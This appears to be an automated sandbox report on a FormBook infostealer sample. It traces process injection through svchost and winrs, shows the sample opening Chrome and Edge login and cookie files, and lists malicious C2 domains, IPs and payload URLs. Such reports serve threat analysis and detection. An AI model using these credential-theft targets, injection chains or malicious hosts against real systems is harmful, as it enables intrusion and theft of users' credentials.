                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtTerminateThread: Direct from: 0x77672FCC
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtProtectVirtualMemory: Direct from: 0x77667B2E
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtQueryInformationToken: Direct from: 0x77672CAC
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtAllocateVirtualMemory: Direct from: 0x77672BEC
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtDeviceIoControlFile: Direct from: 0x77672AEC
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtQuerySystemInformation: Direct from: 0x776748CC
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtQueryAttributesFile: Direct from: 0x77672E6C
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtSetInformationThread: Direct from: 0x77672B4C
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtOpenSection: Direct from: 0x77672E0C
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtQueryVolumeInformationFile: Direct from: 0x77672F2C
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtSetInformationThread: Direct from: 0x776663F9
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtAllocateVirtualMemory: Direct from: 0x776748EC
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtCreateKey: Direct from: 0x77672C6C
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtReadVirtualMemory: Direct from: 0x77672E8C
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtWriteVirtualMemory: Direct from: 0x7767490C
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtAllocateVirtualMemory: Direct from: 0x77673C9C
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | NtDelayExecution: Direct from: 0x77672DDC
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\winrs.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\winrs.exe | Section loaded: NULL target: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe protection: read write
                Source: C:\Windows\SysWOW64\winrs.exe | Section loaded: NULL target: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\winrs.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\winrs.exe | Thread register set: target process: 5980
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 23D2008
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0092B106 LogonUserW, 0_2_0092B106
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_008F3D19 GetCurrentDirectoryW, IsDebuggerPresent, GetFullPathNameW, SetCurrentDirectoryW, MessageBoxA, SetCurrentDirectoryW, GetForegroundWindow, ShellExecuteW, 0_2_008F3D19
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0093411C SendInput, keybd_event, 0_2_0093411C
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_009374BB mouse_event, 0_2_009374BB
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\A2028041200SD.exe"
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | Process created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"
                Source: C:\Windows\SysWOW64\winrs.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0092A66C GetSecurityDescriptorDacl, _memset, GetAclInformation, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity, 0_2_0092A66C
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_009371FA AllocateAndInitializeSid, CheckTokenMembership, FreeSid, 0_2_009371FA
                Source: A2028041200SD.exe, zJGHFZpQDL.exe, 00000009.00000002.3124130451.0000000001431000.00000002.00000001.00040000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000000.1311242597.0000000001430000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: zJGHFZpQDL.exe, 00000009.00000002.3124130451.0000000001431000.00000002.00000001.00040000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000000.1311242597.0000000001430000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: zJGHFZpQDL.exe, 00000009.00000002.3124130451.0000000001431000.00000002.00000001.00040000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000000.1311242597.0000000001430000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: EProgram Manager
                Source: A2028041200SD.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: zJGHFZpQDL.exe, 00000009.00000002.3124130451.0000000001431000.00000002.00000001.00040000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000000.1311242597.0000000001430000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_009165C4 cpuid 0_2_009165C4
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0094091D GetLocalTime, SystemTimeToFileTime, LocalFileTimeToFileTime, __wsplitpath, _wcscat, _wcscat, GetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, _wcscpy, SetCurrentDirectoryW, 0_2_0094091D
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0096B340 GetUserNameW, 0_2_0096B340
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_00921E8E __lock, ____lc_codepage_func, __getenv_helper_nolock, _free, _strlen, __malloc_crt, _strlen, __invoke_watson, _free, GetTimeZoneInformation, WideCharToMultiByte, WideCharToMultiByte, 0_2_00921E8E
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0090DDC0 GetVersionExW, GetCurrentProcess, FreeLibrary, GetNativeSystemInfo, FreeLibrary, FreeLibrary, GetSystemInfo, GetSystemInfo, 0_2_0090DDC0

                Stealing of Sensitive Information

                Source: Yara match | File source: 8.2.svchost.exe.24b0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.svchost.exe.24b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.3124723950.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1391788061.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3124795821.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1391861547.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1390489944.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3121706684.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3132931690.0000000008020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3124924415.0000000004A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\winrs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\winrs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: A2028041200SD.exe | Binary or memory string: WIN_81
                Source: A2028041200SD.exe | Binary or memory string: WIN_XP
                Source: A2028041200SD.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: A2028041200SD.exe | Binary or memory string: WIN_XPe
                Source: A2028041200SD.exe | Binary or memory string: WIN_VISTA
                Source: A2028041200SD.exe | Binary or memory string: WIN_7
                Source: A2028041200SD.exe | Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match | File source: 8.2.svchost.exe.24b0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.svchost.exe.24b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.3124723950.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1391788061.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3124795821.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1391861547.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1390489944.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3121706684.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3132931690.0000000008020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3124924415.0000000004A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_00948C4F socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket, 0_2_00948C4F
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0094923B socket, WSAGetLastError, bind, WSAGetLastError, closesocket, 0_2_0094923B
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_009258C5 RpcBindingSetOption, _LocaleUpdate::_LocaleUpdate, _memset, WideCharToMultiByte, GetLastError, _memset, 0_2_009258C5

                MITRE ATT&CK Matrix

                The matrix is listed below by tactic; the number in front of a technique is the count badge the report displays for it, techniques without a number had no matching signature.

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 312 Process Injection; Startup Items; Scheduled Task/Job; At
                Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 312 Process Injection
                Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph

                Behavior Graph ID: 1559171
                Sample: A2028041200SD.exe
                Start date: 20/11/2024
                Architecture: WINDOWS
                Score: 100

                Start node signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 3 other signatures
                Start node DNS/IP info: www.dating-apps-az-dn5.xyz; www.beylikduzu616161.xyz (Performs DNS queries to domains with low reputation); 15 other IPs or domains

                Process chain:
                A2028041200SD.exe (started)
                    Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                    -> svchost.exe (started)
                        Signatures: Maps a DLL or memory area into another process
                        -> zJGHFZpQDL.exe (injected)
                            DNS/IP info: thaor56.online 202.92.5.23, ports 49985, 49986, 49987, VNPT-AS-VNVNPTCorpVN Viet Nam; www.zxyck.net 118.107.250.103, ports 50001, 50002, 50003, OCENET-AS-APOCESdnBhdISPMY Hong Kong; 9 other IPs or domains
                            Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                            -> winrs.exe (started)
                                Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
                                -> firefox.exe (started)

                Antivirus, Machine Learning and Genetic Malware Detection

                Source | Detection | Scanner | Label | Link
                A2028041200SD.exe | 32% | ReversingLabs | Win32.Trojan.AutoitInject
                A2028041200SD.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwinrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
194.195.220.41 | www.earbudsstore.shop | Germany | 6659 | NEXINTO-DE | true
209.74.77.109 | www.dailyfuns.info | United States | 31744 | MULTIBAND-NEWHOPEUS | true
188.114.97.3 | www.zkdamdjj.shop | European Union | 13335 | CLOUDFLARENETUS | true
103.230.159.86 | superiorfencing.net | Australia | 133159 | MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU | true
194.245.148.189 | www.maitreyatoys.world | Germany | 5517 | CSLDE | true
23.167.152.41 | gtml.huksa.huhusddfnsuegcdn.com | Reserved | 395774 | ESVC-ASNUS | false
188.114.96.3 | www.mydreamdeal.click | European Union | 13335 | CLOUDFLARENETUS | true
66.29.132.194 | orbitoasis.online | United States | 19538 | ADVANTAGECOMUS | true
118.107.250.103 | www.zxyck.net | Hong Kong | 24321 | OCENET-AS-APOCESdnBhdISPMY | true
199.59.243.227 | www.dating-apps-az-dn5.xyz | United States | 395082 | BODIS-NJUS | true
202.92.5.23 | thaor56.online | Viet Nam | 45899 | VNPT-AS-VNVNPTCorpVN | true
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1559171
                                                                      Start date and time:2024-11-20 09:21:38 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 8m 46s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Run name:Run with higher sleep bypass
Number of new started processes analysed:16
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:A2028041200SD.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@14/11
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 98%
                                                                      • Number of executed functions: 53
                                                                      • Number of non-executed functions: 296
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • VT rate limit hit for: A2028041200SD.exe
                                                                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
194.195.220.41 | SecuriteInfo.com.Win32.Malware-gen.10660.18305.exe | malicious | FormBook | www.gemtastic.shop/junu/
194.195.220.41 | Quotation-27-08-24.exe | malicious | FormBook | www.techcables.shop/0hup/
194.195.220.41 | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook | www.ytonetgearhub.shop/l8y2/
194.195.220.41 | swift_payment_pdf.exe | malicious | FormBook | www.cheapdesklamp.shop/9nq7/
188.114.97.3 | Delivery_Notification_00000260791.doc.js | malicious | Unknown | radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
188.114.97.3 | ce.vbs | malicious | Unknown | paste.ee/d/lxvbq
188.114.97.3 | Label_00000852555.doc.js | malicious | Unknown | tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
188.114.97.3 | PO 20495088.exe | malicious | FormBook | www.ssrnoremt-rise.sbs/3jsc/
188.114.97.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/zWkbOqX7/download
188.114.97.3 | http://kklk16.bsyo45ksda.top | malicious | Unknown | kklk16.bsyo45ksda.top/favicon.ico
188.114.97.3 | gusetup.exe | malicious | Unknown | www.glarysoft.com/update/glary-utilities/pro/pro50/
188.114.97.3 | Online Interview Scheduling Form.lnk | malicious | Ducktail | gmtagency.online/api/check
188.114.97.3 | View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htm | malicious | Unknown | f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
188.114.97.3 | SWIFT 103 202414111523339800 111124.pdf.vbs | malicious | Remcos | paste.ee/d/YU1NN
Match | Associated Sample Name / URL | Detection | Threat Name | Context
gtml.huksa.huhusddfnsuegcdn.com | need quotations.exe | malicious | FormBook | 23.167.152.41
gtml.huksa.huhusddfnsuegcdn.com | rGO880-PDF.exe | malicious | FormBook | 206.119.185.138
gtml.huksa.huhusddfnsuegcdn.com | Arrival Notice.exe | malicious | FormBook | 206.119.185.141
gtml.huksa.huhusddfnsuegcdn.com | Maryam Farokhi-PhD- CV-1403.exe | malicious | FormBook | 23.167.152.41
gtml.huksa.huhusddfnsuegcdn.com | NIlfETZ9aE.exe | malicious | FormBook | 206.119.185.226
gtml.huksa.huhusddfnsuegcdn.com | s200ld6btf.exe | malicious | FormBook | 206.119.185.225
gtml.huksa.huhusddfnsuegcdn.com | MV Sunshine.exe | malicious | FormBook | 206.119.185.225
gtml.huksa.huhusddfnsuegcdn.com | dzkb5Gfd33.exe | malicious | FormBook | 206.119.185.189
gtml.huksa.huhusddfnsuegcdn.com | Nowe zam#U00f3wienie zakupu pdf.exe | malicious | FormBook | 206.119.185.165
